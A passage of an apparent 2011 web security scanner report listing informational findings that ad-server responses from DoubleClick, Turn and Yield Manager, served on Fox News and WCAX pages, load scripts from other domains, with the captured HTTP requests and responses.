Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=http://a.rfihub.com/acs/123_1_YWE9OTUzMCw4NDE1MiwxMjM1MiwzNjEyMzAsODI0LDEwMjYxLEFjWHpVSjJacENpTixwLDQ5MiwxMjQ5LDM4Mzg3LDEyNzksNjYxMyZyYj00NDUmcmU9MTIzODcX">
</SCRIPT>
...[SNIP]...
<img src="http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-rocketfuel&cg=369576644441445542&cc=1" width="1" height="1" border="0" alt=""><script src="http://b.scorecardresearch.com/beacon.js?c1=8&c2=6820648&c3=1&c4=&c5=&c6="></script>
...[SNIP]...
11.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/fnc/root/stocksearch

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 940
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:06 GMT
Expires: Mon, 11 Apr 2011 16:21:06 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript" src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f"></script>
...[SNIP]...
11.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/community;sz=468x60;wnsz=1;tile=7;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2642

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=52;tile=4;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=10981992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326411&PluID=0&w=300&h=250&ord=[timestamp]&ucm=true"></script>
...[SNIP]...
11.5. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=52;tile=5;wncc=News;wnpt=C;wnpc=category;wncp=WCAX;wncid=18197;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_188169=wcax;wnad88_50966=wcax;wnad88_50910=wcax;wnad49=wcax;apptype=platform;env=production;ord=19818295? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2863

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true"></script>
...[SNIP]...
11.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/news;sz=300x250;wnsz=43;tile=4;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=14408230
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:59:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326411&PluID=0&w=300&h=250&ord=[timestamp]&ucm=true"></script>
...[SNIP]...
11.8. http://ad.doubleclick.net/adi/wn.loc.wcax/political  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/political

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/political;sz=300x250;wnsz=52;tile=5;wncc=Political;wnpt=S;wnpc=story;wncp=WCAX;wncid=503137;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=99140980? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3327

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 13713 Template Name = TEST WorldNow Flash I
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.9. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/promotion1;sz=468x60;wnsz=1;tile=6;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2642

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/promotion1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/promotion1;sz=728x90;wnsz=41;tile=3;wncc=Promotion%201;wnpt=S;wnpc=story;wncp=WCAX;wncid=452989;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad49=wcax;apptype=platform;env=production;ord=87321408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=452989
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 13:16:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true"></script>
...[SNIP]...
11.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/sales-lifestyle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/sales-lifestyle;sz=300x250;wnsz=43;tile=4;wncc=Sales%20-%20Lifestyle;wnpt=C;wnpc=category;wncp=WCAX;wncid=68446;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad88_13544=ap;wnad49=wcax;apptype=platform;env=production;ord=81412589? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2684

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/weather

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/wn.loc.wcax/weather;sz=300x250;wnsz=43;tile=4;wncc=Weather;wnpt=C;wnpc=weather;wncp=WCAX;wncid=18196;=undefined;=undefined;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=79347955? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:30:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2653

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6959 Template Name = +WorldNow Flash Banner
...[SNIP]...
<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
11.13. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=bvq28451foJSYWMGSWpGLm57PuP1ep3e8pYSpjMgXYBgzZsm_MD3Ph0_AT4tfqL1DmeJqXqoXz4419yIOhU5gOeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmWjHRY6EBGuSwXwHGMEC0xL3dnura1cEVep9swAHPGcQgMIlGKLUwZcdE7RzNOB1XKprf8mRndDhhFf8Sdys88gdgxCVuolRLb7Z-3WuXH2eelAZ6GtOP-ASuDVvjj6Alva3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoFtBivKRqgKwft45cpCMCxp949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8MbnZNh9bOlTF5VJxTMpf6PQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027583195495811192 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15069%7C15069%7C15069%7C15069%7Cundefined%7C15069; rv=1; uid=4608069584519221037; pf=cu1FbtXKKpFof-hWjfkQRcVIkA_tbns9D4-b88MB0l6CH-nC-kQ69MLaDP7avFRDzd5xTtrRgn51HC41qoSB9_pqNLucEh96CCAoHJ73Ep-dCbxIubA9vJ0TJiztXY_3cxb2oDS_ZBeMeceweOTTRM5O3f8IMqs1jnadlyIx8Ew

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 11 Apr 2011 12:35:43 GMT
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=tmY-x8L_yowSJFqM0vF4Y8CuY9t_hBSzjQil7z33OlYpagDPKKctVczI9DEFcEkPcxpGHxRlubu1xR21Mxu4g-sHDXOosP1lwOMr_-ta2t973bvsD6p3TnXOe8vTPY4VFaT6eTBuV55JRFz8lx3PqdqozOSXNU0m0cAav4sZMCcTY1vGdjvt8S43nB6dS9OmxjcTGL1eKfAUVOMXIUnylA; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: fc=eFAOz3ilQ4gYIBtFIJGWAE5_UN3y883I71mcX_0aEuuubHizRKm2LPdnMwd17GsW3WQO872ou4xvEVRnVXW81PsHnm-jU8W9DeXq1d2r1JKkV1vPzSwkQiZJzLr4lAFo; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Set-Cookie: pf=snK9kHUjEl1FaWKxPCEh1sJ8lErb_iSlHvQid9sfqYGDVsdGVkOFL386xes7a4VRH-w_0yHZxr5U-a1ULJAMKQRyElVn9VAUzXky4Bxf5K8hlcBpkm8Sg5-23YdyuJpz9_hZk2y4Lc1tg0PRNwxT__KovNH6HfPSeeybFLsgN_DN9JRYGQVWUbjEaPiKqkBr8AkkycJ0w6q2tbQDIXhSrAgkLZbHfwITF7RboAby-GXjYWEb1kaerphA9cWJarOLh_BwiBS09OfPB0I41L7nq5FuSGZvCDWT_YGlhDw-_9zGhvu2FiJEpdM7zDK0xqeWNUj9wzAaHETIIAZhDZgOW6C-zFUZM9OcnDkQKyl2S7I; Domain=.turn.com; Expires=Thu, 06-Oct-2011 12:35:43 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 10051


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
<!-- BEGIN STANDARD TAG - 468 x 60 - Turn Sprint Q1: Run-of-site - DO NOT MODIFY -->\n<SCRIPT TYPE="text/javascript" SRC="http://ads.bluelithium.com/st?ad_type=ad&ad_size=468x60&section=1689424&pub_redirect_unencoded=1&pub_redirect=http://r.turn.com/r/formclick/id/J81uPvGhVn7WCA8ABgIBAA/url/"></SCRIPT>
...[SNIP]...
11.14. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?wT8nBQNzEgCKRUkAAAAAAAoODwAAAAAAAgAAAAIAAAAAAP8AAAACDMxcHgAAAAAAFCMVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAA..9fSPlwxT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWnlzTrhPsCRs0MtA00DGMqIYxffa9YHqn-QdSAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302540075598%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D4049171621%26B%3D10%26r%3D0,86330604-645a-11e0-bf3c-003048d6d8aa HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
